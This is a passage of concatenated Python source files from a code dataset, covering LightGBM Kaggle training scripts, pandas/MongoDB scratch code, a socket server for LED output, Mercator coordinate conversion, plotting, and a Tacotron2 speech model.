target\n target = pd.read_pickle(os.path.join(basepath, output_path + 'feature_groups/' + f'application_train.pkl'))['TARGET'] \n train.loc[:, 'TARGET'] = target.values # add target to train\n\n data = pd.concat((train, test))\n data = m.reduce_mem_usage(data)\n\n print('Shape of data: {}'.format(data.shape))\n \n train = data.iloc[:m.n_train]\n\n del data, test\n gc.collect()\n\n feature_list = train.columns.drop('TARGET').tolist()\n \n PARAMS['random_state'] = SEED\n \n cv_adversarial_filepath = os.path.join(basepath, 'data/raw/cv_idx_test_stratified.csv') \n \n mean_auc, std_auc = m.cross_validate(train, feature_list, PARAMS.copy(), cv_adversarial_filepath)\n cv_score = str(mean_auc) + '_' + str(std_auc)\n \n print('*' * 100)\n print('Best AUC: {}'.format(cv_score))\n \n joblib.dump(PARAMS, os.path.join(basepath, output_path + f'{data_folder}{MODEL_FILENAME}_{SEED}_params.pkl'))\n joblib.dump(cv_score, os.path.join(basepath, output_path + f'{data_folder}{MODEL_FILENAME}_{SEED}_cv.pkl'))\n \n elif args.t:\n print('Full training ..')\n\n train_filenames = [\n 'v127_4457_oof_train_preds.npy',\n 'v128_4457_oof_train_preds.npy',\n 'v136_4457_oof_train_preds.npy'\n ]\n\n test_filenames = [\n 'v127_4457_test_preds.npy',\n 'v128_4457_test_preds.npy',\n 'v136_4457_test_preds.npy'\n ]\n\n\n input_path = args.input_path\n output_path = args.output_path\n data_folder = args.data_folder\n is_sample = args.s\n CV_SEED = args.cv_seed\n SEED = args.seed\n\n params = {\n 'input_path': input_path,\n 'output_path': output_path,\n 'data_folder': data_folder\n }\n\n m = Modelv135(**params)\n \n train = 
m.load_data(train_filenames)\n test = m.load_data(test_filenames)\n\n train, test = m.fe(train, test)\n\n # load target\n target = pd.read_pickle(os.path.join(basepath, output_path + 'feature_groups/' + f'application_train.pkl'))['TARGET'] \n train.loc[:, 'TARGET'] = target.values # add target to train\n\n data = pd.concat((train, test))\n data = m.reduce_mem_usage(data)\n\n print('Shape of data: {}'.format(data.shape))\n \n train = data.iloc[:m.n_train]\n test = data.iloc[m.n_train:]\n\n del data\n gc.collect()\n\n feature_list = train.columns.drop('TARGET').tolist()\n\n # Load params and holdout score from disk.\n PARAMS = joblib.load(os.path.join(basepath, output_path + f'{data_folder}{MODEL_FILENAME}_{CV_SEED}_params.pkl'))\n HOLDOUT_SCORE = joblib.load(os.path.join(basepath, output_path + f'{data_folder}{MODEL_FILENAME}_{CV_SEED}_cv.pkl'))\n\n PARAMS['random_state'] = SEED\n\n print('*' * 100)\n print('PARAMS are: {}'.format(PARAMS))\n\n # train model\n model, feat_df = m.train(train, test, feature_list, is_eval=False, **PARAMS)\n \n # evaluation part\n preds, score = m.evaluate(test, feature_list, is_eval=False, model=model)\n\n sub_identifier = \"%s-%s-%s-%s-%s\" % (datetime.now().strftime('%Y%m%d-%H%M'), MODEL_FILENAME, HOLDOUT_SCORE, SEED, data_folder[:-1])\n\n sub = pd.read_csv(os.path.join(basepath, 'data/raw/sample_submission.csv.zip'))\n sub['TARGET'] = preds\n\n sub.to_csv(os.path.join(basepath, 'submissions/%s.csv'%(sub_identifier)), index=False)","sub_path":"src/v135.py","file_name":"v135.py","file_ext":"py","file_size_in_byte":9459,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"606251891","text":"import json\nfrom dateutil.relativedelta import relativedelta as rd\nimport pandas as pd\n\nfile = r'C:/Programming/Python/Projects/mymoney/data/scrubbed-test.csv'\nwith open(file) as data_file:\n data = json.load(data_file)\ndf = pd.DataFrame(data)\n\n\n\n\nfile = r'C:/Programming/Python/Projects/mymoney/data/scrubbed-test.csv'\ndf = pd.read_csv(file)\ndf.fillna('', inplace=True)\ndf['Date'] = pd.to_datetime(df['Date'])\n\ndf.sort_values(['Date', 'Amount', 'Full_Description'], inplace=True, ascending=True)\ndf.reset_index(drop=True, inplace=True)\n\nstart = df['Date'].iloc[0]\nend = df['Date'].iloc[-1]\nmonths = pd.date_range(start=start+rd(months=-1), end=end+rd(months=1), freq='MS') # MS = Month Start\n\nfor month in months:\n indices = df[(df.Date >= month) & (df.Date < month+1)].index.get_values()\n for i in range(0, indices.__len__()):\n df.set_value(indices[i], 'Transaction_Number', int(i+1))\n\ndf['Transaction_ID'] = df['Transaction_Number'].map(lambda x: str(x)[:-2]) + '-' + \\\n df['Date'].apply(lambda x: x.strftime('%m%d%Y'))\ndf['Date'] = df['Date'].apply(lambda x: x.strftime('%m/%d/%Y'))\ndf['Transaction_Number'] = df['Transaction_Number'].map(lambda x: str(x)[:-2])\n\ndict = df.to_dict(orient='records')\n\n\n\n\n\n\n\n\n\ndf.to_csv(path_or_buf=r'C:/users/ncc/df.csv')\n\nprint(df[['Amount', 'Date', 'Full_Description']])\nprint(df[['Amount', 'Date', 'Full_Description', 'Transaction_Number']])\n\n\ndf = pd.DataFrame(columns=['A', 'B'], index= [1, 2, 3, 4])\n\ndf.set_value(1, 'A', 2)\ndf.set_value(4, 'A', 3)\ndf['B'] = df['A'].map(str)\n\na = 'test!'\na[:-2]\n\n\n\ndate = \"2016-03-03T00:00:00.000Z\"\ndatetime.date(date)\n\n\n\n\n\n\nfrom pymongo import MongoClient, UpdateOne\nfrom pymongo.collection import Collection\nfrom pymongo.database import Database\n\nclient = MongoClient('localhost', 27017)\nnew_db = 
Database(client=client, name='new_db')\ncol = Collection(database=new_db, name='col')\ndata = [\n {\n \"id\": \"1\",\n \"data\": \"1\"\n },\n {\n \"id\": \"2\",\n \"data\": \"2\"\n },\n {\n \"id\": \"3\",\n \"data\": \"3\"\n }\n]\nrequests = []\nfor d in data:\n filter = {'id': d['id']}\n requests.append(UpdateOne(filter, update={'$set': d}, upsert=True))\nres = col.bulk_write(requests=requests)\n\nfor row in col.find():\n print(row)\n\n\n\nclient.cl\nbank_schemas = Collection(database=mymoney, name='bank_schemas', create=True)\ndocs = [\n {\n 'format': 'ftb',\n 'headers': ['Transaction Type', 'Date', 'Account Type', 'Description', 'Amount', 'Reference No.', 'Credits', 'Debits']\n },\n {\n 'format': 'cb',\n 'headers': ['Type', 'Trans Date', 'Post Date', 'Description', 'Amount']\n },\n {\n 'format': 'scrubbed',\n 'headers': ['Transaction_ID', 'Date', 'Transaction_Type', 'Account_Name', 'Account_Type', 'Short_Description', 'Full_Description', 'Amount', 'Expense_Type', 'Category_1 ', 'Category_2', 'Category_3', 'Notes', 'Source']\n }\n]\nbank_schemas.insert_many(documents=docs)\nschemas = bank_schemas.find()\nfor schema in schemas:\n print(schema['headers'])\n\nschemas = Collection(database=g.db, name=mymoney.config['COLLECTION_SCHEMAS'])\n\nimport scipy.stats as st\n\nst.norm.cdf(0)\n\n\nfrom pymongo import MongoClient, UpdateOne\nfrom pymongo.collection import Collection\nfrom pymongo.database import Database\n\nclient = MongoClient('localhost', 27017)\nmymoney = Database(client=client, name='mymoney')\ncol = Collection(database=mymoney, name='transactions')\n\ncur = col.find({\"Category_1\": \"\"})\n\ndict(cur.next())\n\nfor c in cur:\n print(c)\n\n\n\n\n\n\n\n\n\n\ntest1 = ['Date', 'Transaction_Type', 'Account_Name', 'Account_Type', 'Short_Description', 'Full_Description', 'Amount', 'Expense_Type',\n'Category_1', 'Category_2', 'Category_3', 'Notes']\n\ntest2 = ['Date', 'Transaction_Type', 'Account_Name', 'Account_Type', 'Short_Description', 'Full_Description', 'Amount', 'Expense_Type',\n'Category_1', 'Category_2', 'Category_3', 'Notes']\n\n\nfor i in range(0, test1.__len__()):\n print(test1[i] == test2[i])\n\nfor header in test1:\n if header not in test2:\n print('fuck')\n print(header)","sub_path":"test/scratch.py","file_name":"scratch.py","file_ext":"py","file_size_in_byte":4074,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"175212077","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Mar 29 17:53:37 2019\n\n@author: kazuki.onodera\n\"\"\"\n\nimport numpy as np\nimport pandas as pd\nimport os, gc\nfrom glob import glob\nfrom tqdm import tqdm\n\nimport sys\nsys.path.append(f'/home/{os.environ.get(\"USER\")}/PythonLibrary')\nimport lgbextension as ex\nimport lightgbm as lgb\nfrom multiprocessing import cpu_count\n\nimport utils\n\n#utils.start(__file__)\n# =============================================================================\n\n#SUBMIT_FILE_PATH = '../output/0328-1.csv.gz'\n#\n#COMMENT = 'lgb shuffle row'\n\nEXE_SUBMIT = True\n\nNFOLD = 5\n\nLOOP = 1\n\nparam = {\n 'objective': 'binary',\n 'metric': 'None',\n \n 'learning_rate': 0.1,\n 'max_depth': -1,\n 'num_leaves': 2**6 -1,\n 'max_bin': 255,\n \n 'min_child_weight': 10,\n 'min_data_in_leaf': 150,\n 'reg_lambda': 0.5, # L2 regularization term on weights.\n 'reg_alpha': 0.5, # L1 regularization term on weights.\n \n 'colsample_bytree': 0.5,\n 'subsample': 0.7,\n# 'nthread': 32,\n 'nthread': cpu_count(),\n 'bagging_freq': 1,\n 'verbose':-1,\n 
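
The per-class `shuffle()` helper defined a little further down in this same `lgb_aug.py` record permutes each feature column independently within one class, an augmentation trick for models that treat features as (near-)independent. A small demonstration of why it is label-safe (a sketch, not from the source): it preserves each column's marginal distribution while destroying cross-feature correlation:

```python
import numpy as np
import pandas as pd

rng = np.random.RandomState(0)
a = rng.normal(size=1000)
df = pd.DataFrame({'a': a, 'b': a + rng.normal(scale=0.1, size=1000)})

# Same idea as shuffle() below: an independent permutation per column.
shuffled = df.apply(lambda c: rng.permutation(c.values))

print(df.corr().loc['a', 'b'])        # close to 1.0
print(shuffled.corr().loc['a', 'b'])  # close to 0.0
```
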
}\n\n\nNROUND = 9999\nESR = 100\nVERBOSE_EVAL = 50\nSEED = np.random.randint(9999)\n\n\n# =============================================================================\n# load\n# =============================================================================\nX_train = pd.read_csv('../input/train.csv.zip')\n\ny_train = X_train['target']\nX_train = X_train.iloc[:,2:]\n\nX_train_0 = X_train[y_train==0]\nX_train_1 = X_train[y_train==1]\n\ndef shuffle(df):\n df_ = pd.DataFrame(index=df.index)\n for c in tqdm(df.columns):\n df_[c] = df[c].sample(frac=1).values #+ (0.1*np.random.uniform( -1,1, len(df) ))\n return df_\n\n\nX_train_ = pd.concat([shuffle(X_train_0), shuffle(X_train_0), shuffle(X_train_0),\n shuffle(X_train_1), shuffle(X_train_1), shuffle(X_train_1),\n ]).sort_index()\ny_train_ = pd.concat([y_train, y_train, y_train\n ]).sort_index()\n\n\n# =============================================================================\n# model\n# =============================================================================\ndtrain = lgb.Dataset(X_train_, y_train_.values, \n free_raw_data=False)\ngc.collect()\n\nmodel_all = []\nnround_mean = 0\nloss_list = []\ny_preds = []\nfor i in range(LOOP):\n gc.collect()\n \n param['seed'] = np.random.randint(9999)\n \n ret, models = lgb.cv(param, dtrain, NROUND,\n nfold=NFOLD,\n# folds=group_kfold.split(X_train_, y_train_, group),\n stratified=True, shuffle=True,\n feval=ex.eval_auc,\n early_stopping_rounds=ESR, \n verbose_eval=VERBOSE_EVAL,\n seed=SEED+i)\n \n y_pred = ex.eval_oob(X_train_, y_train_.values, models, SEED+i, \n# folds=group_kfold.split(X_train_, y_train_, group),\n stratified=True, shuffle=True)\n y_preds.append(y_pred)\n \n model_all += models\n nround_mean += len(ret['auc-mean'])\n loss_list.append( ret['auc-mean'][-1] )\n\nnround_mean = int((nround_mean/LOOP) * 1.3)\n\n\n## =============================================================================\n## test\n## =============================================================================\n#\n#test = pd.read_csv('../input/test.csv.zip')\n#\n#sub = pd.read_csv('../input/sample_submission.csv.zip')\n#\n#for model in tqdm(models):\n# sub['target'] += pd.Series(model.predict(test.iloc[:,1:])).rank()\n#sub['target'] /= sub['target'].max()\n#\n#\n#\n#\n#\n#\n#\n## save\n#sub.to_csv(SUBMIT_FILE_PATH, index=False, compression='gzip')\n#\n## =============================================================================\n## submission\n## =============================================================================\n#if EXE_SUBMIT:\n# print('submit')\n# utils.submit(SUBMIT_FILE_PATH, COMMENT)\n#\n#\n#\n##==============================================================================\n#utils.end(__file__)\n##utils.stop_instance()\n\n\n","sub_path":"py/lgb_aug.py","file_name":"lgb_aug.py","file_ext":"py","file_size_in_byte":4228,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"585381541","text":"#!/usr/bin/env python3\n\nimport socket\nimport json\nimport struct\nimport time\n\nclass RadianceOutputDevice:\n def __init__(self, port=9001):\n self.port = port\n\n def listen(self):\n self.serversocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.serversocket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n self.serversocket.bind((\"\", self.port))\n self.serversocket.listen(1)\n\n def accept(self):\n (clientsocket, address) = self.serversocket.accept()\n self.clientsocket = clientsocket\n self.buffer = b\"\"\n\n def send_packet(self, 
d):\n length_bytes = struct.pack(\"<I\", len(d))\n #print(\"sending\", len(length_bytes + d), \"bytes\")\n self.clientsocket.send(length_bytes + d)\n\n def send_description(self, description):\n self.send_packet(bytes((0,)) + bytes(json.dumps(description), encoding=\"utf8\"))\n\n def send_get_frame(self, frame_period_ms):\n self.send_packet(bytes((1,)) + struct.pack(\"<I\", frame_period_ms))\n\n def send_lookup_2d(self, locations):\n locations_flat = [item for sublist in locations for item in sublist]\n self.send_packet(bytes((3,)) + struct.pack(\"<{}f\".format(len(locations_flat)), *locations_flat))\n\n def send_physical_2d(self, locations):\n locations_flat = [item for sublist in locations for item in sublist]\n self.send_packet(bytes((4,)) + struct.pack(\"<{}f\".format(len(locations_flat)), *locations_flat))\n\n def send_geometry_2d(self, fn):\n with open(fn, \"rb\") as f:\n self.send_packet(bytes((5,)) + f.read())\n\n def recv_packet(self):\n while True:\n result = self.clientsocket.recv(4096)\n if not result:\n break\n self.buffer += result\n if len(self.buffer) > 4:\n (packet_length,) = struct.unpack(\"<I\", self.buffer[0:4])\n if len(self.buffer) - 4 >= packet_length:\n packet = self.buffer[0:packet_length + 4]\n self.buffer = self.buffer[packet_length + 4:]\n return packet\n\n def parse_frame(self, packet):\n if packet[4] != 2:\n return\n return [(packet[i], packet[i+1], packet[i+2], packet[i+3]) for i in range(5, len(packet), 4)]\n\ndef main():\n d = RadianceOutputDevice()\n d.listen()\n\n while True:\n print(\"Waiting for a connection on port {}\".format(d.port))\n d.accept()\n\n print(\"Connected!\")\n # This tells Radiance the name of our device, and how big the sampled canvas should be.\n d.send_description({\"name\": \"Python test server\", \"size\": [100,100]})\n\n # This would request 5 pixels at the corners and center.\n #d.send_lookup_2d([(0, 0), (0, 1), (1, 0), (1, 1), (0.5, 0.5)])\n\n # Instead, lets request 120 pixels around the border.\n N = 30\n pts = [(0, i / N) for i in range(N)]\n pts += [(i / N, 0) for i in range(N)]\n pts += [(1, 1 - i / N) for i in range(N)]\n pts += [(1 - i / N, 1) for i in range(N)]\n d.send_lookup_2d(pts)\n\n # If we stopped here, Radiance would visualize this display using the lookup coordinates\n # and show a square.\n # If the physical display looks different, we tell Radiance about it with the\n # \"physical coordinates\" command.\n # Lets tell Radiance to visualize the points as a circle instead.\n\n import math\n def moveToCircle(x, y):\n l = math.hypot(x - 0.5, y - 0.5)\n return (0.5 * (x - 0.5) / l + 0.5, 0.5 * (y - 0.5) / l + 0.5)\n d.send_physical_2d([moveToCircle(x, y) for (x, y) in pts])\n\n # We can send radiance a PNG file to be used as a background image for visualization.\n # This logo image is not very useful, but perhaps some line-art of your venue would work well.\n\n #d.send_geometry_2d(\"../resources/library/images/logo.png\")\n\n # Ask for frames from Radiance every 10 ms (100 FPS)\n\n d.send_get_frame(10)\n\n while True:\n packet = d.recv_packet()\n if not packet:\n break\n # Print out the received pixel colors.\n # This line is commented out because it generates a lot of output.\n #print(d.parse_frame(packet))\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"support/test_server.py","file_name":"test_server.py","file_ext":"py","file_size_in_byte":4326,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"422245221","text":"import json\nimport math\nfrom decimal 
import Decimal, ROUND_HALF_UP\n# Here are all your options for rounding:\n# This one offers the most out of the box control\n# ROUND_05UP ROUND_DOWN ROUND_HALF_DOWN ROUND_HALF_UP\n# ROUND_CEILING ROUND_FLOOR ROUND_HALF_EVEN ROUND_UP\n\n# Function called by pathfind_from_json which takes the data it gets initially\n# and does the primary conversion of data into the proper X, Y and lat long\ndef readJSON(data, scale):\n\n #globally store JSON message\n Json = json.loads('{}')\n\n\n\n #Boundary\n x = convert_lon_to_x(data[\"boundary\"][\"coordinates\"][0][\"longitude\"])\n y = convert_lat_to_y(data[\"boundary\"][\"coordinates\"][0][\"latitude\"])\n data[\"boundary\"][\"coordinates\"][0][\"x\"] = x\n data[\"boundary\"][\"coordinates\"][0][\"y\"] = y\n\n\n\n\n\n #Goal\n x = convert_lon_to_x(data[\"goal\"][\"coordinates\"][\"longitude\"])\n y = convert_lat_to_y(data[\"goal\"][\"coordinates\"][\"latitude\"])\n data[\"goal\"][\"coordinates\"][\"x\"] = x\n data[\"goal\"][\"coordinates\"][\"y\"] = y\n \n #Obstacles\n loc = 0\n loc2 = 0\n #print(\"length of obstacles: {0}\\nObstacle1: {1}\\n\".format(len(data[\"obstacles\"]), data[\"obstacles\"][0]))\n\n if \"obstacles\" not in data:\n print(\"No Obstacles\")\n else:\n while loc < len(data[\"obstacles\"]):\n while loc2 < len(data[\"obstacles\"][loc][\"obstacle_info\"]):\n data[\"obstacles\"][loc][\"obstacle_info\"][loc2][\"x\"] = convert_lon_to_x(data[\"obstacles\"][loc][\"obstacle_info\"][loc2][\"longitude\"])\n data[\"obstacles\"][loc][\"obstacle_info\"][loc2][\"y\"] = convert_lat_to_y(data[\"obstacles\"][loc][\"obstacle_info\"][loc2][\"latitude\"])\n loc2 += 1\n loc += 1\n loc2 = 0\n\n #Robot\n x = convert_lon_to_x(data[\"robots\"][0][\"coordinates\"][\"longitude\"])\n y = convert_lat_to_y(data[\"robots\"][0][\"coordinates\"][\"latitude\"])\n data[\"robots\"][0][\"coordinates\"][\"x\"] = x\n data[\"robots\"][0][\"coordinates\"][\"y\"] = y\n \n with open('data.json', 'w') as outfile:\n json.dump(data, outfile, sort_keys = True, indent = 4, ensure_ascii = False)\n \n return data\n\n# Pseudo Mercator Projections\n# Please don't hate me for the conversion below. It was honestly the best way to do it.\n# Round of float did not work. 
So it is rounded to decimal places by casting to string and recasting to float\ndef convert_lon_to_x(lon):\n r_major = 6378137.000\n string = \"{:.3f}\".format(r_major*math.radians(lon))\n temp = float(string)\n xout = round(temp, 1) \n #print(\"LON TEMP: {0} | {1}\".format(temp, xout)) \n\n return xout\n\ndef convert_lat_to_y(lat):\n r_major = 6378137.000\n tmath = 0-r_major*math.log(math.tan(math.pi/4.0+lat*(math.pi/180.0)/2.0))\n string = \"{:.3f}\".format(tmath)\n temp = float(string) \n\n yout = round(temp, 1)\n #print(\"LAT TEMP: {0} | {1}\".format(temp, yout))\n\n return yout\n\ndef convert_x_to_lon(x):\n r_major = 6378137.000\n return math.degrees(x/r_major)\n\ndef convert_y_to_lat(y):\n r_major = 6378137.000\n y = (0-y)/r_major\n return 180.0/math.pi*(2.0*math.atan(math.exp(y))-math.pi/2.0)\n\n\n\n# returns distance in meters on the mercator map projection\n# from 0 lat 0 lon to the point on the sphere\ndef latlon_xy(coordinates):\n xy = []\n for coordinate in coordinates:\n # reversing order since lat comes first in these\n xy.append((convert_lon_to_x(coordinate[1]), convert_lat_to_y(coordinate[0])))\n return xy\n\ndef xy_latlon(points):\n coordinates = []\n for point in points:\n # reversing order since lat comes first in these\n coordinates.append((convert_y_to_lat(point[1]), convert_x_to_lon(point[0])))\n return coordinates\n\n# Some other helpful functions\ndef findBoundingRectangle(coordinates):\n min_x = min(coordinates, key=lambda t: t[0])[0]\n min_y = min(coordinates, key=lambda t: t[1])[1]\n max_x = max(coordinates, key=lambda t: t[0])[0]\n max_y = max(coordinates, key=lambda t: t[1])[1]\n return [(min_x, min_y), (max_x, max_y)]\n\n# rounds x up to the nearest multiple of base\n# ex. round_to_base(3.1415,10) => 10\n# ex. round_to_base(3.1415,1) => 4\n# (named round_to_base so it does not shadow the builtin round used above)\ndef round_to_base(x,base):\n return int(math.ceil(x/base))*base\n\ndef localizeXY(points,core):\n res = []\n for point in points:\n res.append( (point[0]-core[0],point[1]-core[1]) )\n return res\n\ndef rescaleXY(points,scale,base):\n res = []\n for point in points:\n res.append( (round_to_base(point[0]*scale,base),round_to_base(point[1]*scale,base)) )\n return res\n\ndef backscaleXY(points,scale):\n res = []\n for point in points:\n res.append( (round(point[0]/scale,1),round(point[1]/scale,1)) )\n return res\n\ndef delocalizeXY(points,core):\n res = []\n for point in points:\n res.append( (point[0]+core[0],point[1]+core[1]) )\n return res\n","sub_path":"Pathfinding_and_InternalTesting/latLongConversion.py","file_name":"latLongConversion.py","file_ext":"py","file_size_in_byte":4778,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"534759764","text":"import argparse\n\nfrom experiment_database_reading_manager import ExperimentDatabaseReadingManager\nfrom hplots.hgcal_analysis_plotter import HGCalAnalysisPlotter\nimport sql_credentials\n\nparser = argparse.ArgumentParser(\n 'Analyse predictions from object condensation and plot relevant results')\nparser.add_argument('table_prefix',\n help='Output directory with .bin.gz files or a txt file with full paths of the bin gz files')\nparser.add_argument('output',\n help='PDF file')\n\n\nargs = parser.parse_args()\n\n\nplotter = HGCalAnalysisPlotter()\nreading_manager = ExperimentDatabaseReadingManager(mysql_credentials=sql_credentials.credentials)\nplotter.add_data_from_database(reading_manager, table_prefix=args.table_prefix)\n# plotter.add_data_from_database(reading_manager, table_prefix='alpha_plots_a2')\nplotter.write_to_pdf(args.output, formatter=lambda x: 
'$\\\\beta=%.2f$'%(x['beta_threshold']))","sub_path":"scripts/make_hgcal_plots_from_database.py","file_name":"make_hgcal_plots_from_database.py","file_ext":"py","file_size_in_byte":929,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"495081533","text":"#!/usr/bin/env python\nimport itertools\n\ndef combination(xss):\n number_of_lists = len(xss)\n for f in xss:\n f.sort()\n ans = list(itertools.product(*xss))\n status = []\n\n for tup in ans:\n if sorted(tup) == list(tup):\n status.append(1)\n else:\n status.append(0)\n\n # print(ans)\n # print(status)\n # print(list(itertools.compress(ans, status)))\n\n # d for d, s in zip(data, selectors) if s\n return list(itertools.compress(ans, status))\n\nxss = [\n [\"apple\", \"banana\", \"pear\"],\n [\"car\", \"truck\"],\n [\"zambia\", \"malawi\", \"kenya\"]\n]\n\nprint(combination(xss))","sub_path":"python3/dimagi/set-combination.py","file_name":"set-combination.py","file_ext":"py","file_size_in_byte":573,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"492984926","text":"#!/usr/bin/python\n#coding:utf-8\nimport urllib, urllib2, random\n\ndef url_open(url):\n head = {'User-Agent':'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114Safari/537.36','Cookie':'AspxAutoDetectCookieSupport=1'}\n req = urllib2.Request(url, None, head)\n html = urllib2.urlopen(req).read()\n return html\n\niplist = ['121.193.143.249:80']\n\nproxy_handler = urllib2.ProxyHandler({'http': random.choice(iplist)})\n\nopener = urllib2.build_opener(proxy_handler)\n\nr = opener.open('http://httpbin.org/ip')\n\nprint(r.read())\n\n","sub_path":"re_math.py/proxy.py","file_name":"proxy.py","file_ext":"py","file_size_in_byte":569,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"202900975","text":"import torch\nfrom torch import nn\nfrom torch.autograd import Variable\nimport random\nimport new_models.Tacotron2.hyperparams as hp\n\nfrom modules.Attention_modules import LocationAttention,Attention\nfrom modules.Sequential_modules import *\nfrom modules.Basic_modules import CustomEmbedding\nclass ConvBlock(nn.Module):\n def __init__(self, in_channels, out_channels, kernel_size, padding):\n super(ConvBlock, self).__init__()\n self.conv = nn.Conv1d(in_channels, out_channels, kernel_size, padding=padding)\n self.batch = nn.BatchNorm1d(out_channels)\n self.dropout = nn.Dropout(p=0.5)\n self.relu = nn.ReLU()\n\n def forward(self, x):\n x = self.conv(x)\n x = self.batch(x)\n x = self.relu(x)\n return self.dropout(x)\n\n\nclass ConvTanhBlock(nn.Module):\n def __init__(self, in_channels, out_channels, kernel_size, padding):\n super(ConvTanhBlock, self).__init__()\n self.conv = nn.Conv1d(in_channels, out_channels, kernel_size, padding=padding)\n self.batch = nn.BatchNorm1d(out_channels)\n self.tanh = nn.Tanh()\n\n def forward(self, x):\n x = self.conv(x)\n x = self.batch(x)\n return self.tanh(x)\n\n\nclass PreNet(nn.Module):\n \"\"\"\n Extracts 256d features from 80d input spectrogram frame\n \"\"\"\n\n def __init__(self, in_features=80, out_features=256, dropout=0.5):\n super(PreNet, self).__init__()\n self.fc1 = nn.Linear(in_features, out_features)\n self.fc2 = nn.Linear(out_features, out_features)\n self.relu = nn.ReLU()\n self.dropout = nn.Dropout(p=dropout)\n\n def forward(self, previous_y):\n x = self.relu(self.fc1(previous_y))\n x = self.dropout(x)\n x = self.relu(self.fc2(x))\n x = 
self.dropout(x)\n return x\n\n\nclass PostNet(nn.Module):\n def __init__(self):\n super(PostNet, self).__init__()\n self.conv1 = ConvTanhBlock(in_channels=1, out_channels=512, kernel_size=5, padding=2)\n self.conv2 = ConvTanhBlock(in_channels=512, out_channels=512, kernel_size=5, padding=2)\n self.conv3 = ConvTanhBlock(in_channels=512, out_channels=512, kernel_size=5, padding=2)\n self.conv4 = ConvTanhBlock(in_channels=512, out_channels=512, kernel_size=5, padding=2)\n self.conv5 = nn.Conv1d(in_channels=512, out_channels=1, kernel_size=5, padding=2)\n\n def forward(self, x):\n x = self.conv1(x)\n x = self.conv2(x)\n x = self.conv3(x)\n x = self.conv4(x)\n return self.conv5(x)\n\n\nclass Encoder(nn.Module):\n\n def __init__(self, num_chars=hp.num_chars, embedding_dim=512, hidden_size=256):\n super(Encoder, self).__init__()\n self.char_embedding = nn.Embedding(num_embeddings=num_chars,\n embedding_dim=embedding_dim, padding_idx=0)\n self.conv1 = ConvBlock(in_channels=embedding_dim, out_channels=embedding_dim, kernel_size=5, padding=2)\n self.conv2 = ConvBlock(in_channels=embedding_dim, out_channels=embedding_dim, kernel_size=5, padding=2)\n self.conv3 = ConvBlock(in_channels=embedding_dim, out_channels=embedding_dim, kernel_size=5, padding=2)\n self.birnn = nn.LSTM(input_size=embedding_dim, hidden_size=int(hidden_size/2), bidirectional=True, dropout=0.1,batch_first=True) # TODO add zoneout\n\n def forward(self, text):\n # input - (batch, maxseqlen) | (4, 156)\n x = self.char_embedding(text) # (batch, seqlen, embdim) | (4, 156, 512)\n #x = x.permute(0, 2, 1) # swap to batch, channel, seqlen (4, 512, 156)\n x= x.transpose(1,2) # swap to batch, channel, seqlen (4, 512, 156)\n x = self.conv1(x) # (4, 512, 156)\n x = self.conv2(x) # (4, 512, 156)\n x = self.conv3(x) # (4, 512, 156)\n #x = x.permute(2, 0, 1) # swap seq, batch, dim for rnn | (156, 4, 512)\n x = x.transpose(1,2) # swap seq, batch, dim for rnn | (156, 4, 512)\n x, _ = self.birnn(x) # (156, 4, 512) | 256 dims in either direction\n # sum bidirectional outputs\n #x = (x[:, :, :256] + x[:, :, 256:])\n return x\n\n\nclass Decoder(nn.Module):\n \"\"\"\n Decodes encoder output and previous predicted spectrogram frame into next spectrogram frame.\n \"\"\"\n\n def __init__(self, hidden_size=1024, num_layers=2,\n num_mels=80, num_prenet_features=256):\n super(Decoder, self).__init__()\n self.num_layers = num_layers\n self.hidden_size = hidden_size\n self.num_mels = num_mels\n\n self.prenet = PreNet(in_features=num_mels, out_features=num_prenet_features)\n #self.attention = LocationAttention(encoded_dim=256, query_dim=hidden_size, attention_dim=128)\n self.attention=Attention(hp.att_type,hp.enc_h_size)\n self.rnn = nn.LSTM(input_size=num_prenet_features + 256, hidden_size=hidden_size, num_layers=num_layers, dropout=0.1)\n self.spec_out = nn.Linear(in_features=hidden_size + 256, out_features=num_mels)\n self.stop_out = nn.Linear(in_features=hidden_size + 256, out_features=1)\n self.postnet = PostNet()\n\n def init_hidden(self, batch_size):\n return (nn.Parameter(torch.zeros(self.num_layers, batch_size, self.hidden_size)).cuda(),\n nn.Parameter(torch.zeros(self.num_layers, batch_size, self.hidden_size)).cuda())\n\n def init_mask(self, encoder_out):\n seq1_len, batch_size, _ = encoder_out.size()\n return Variable(encoder_out.data.new(1, batch_size, seq1_len).fill_(0))\n\n def forward(self, previous_out, encoder_out, decoder_hidden=None, mask=None):\n \"\"\"\n Decodes a single frame\n \"\"\"\n previous_out = 
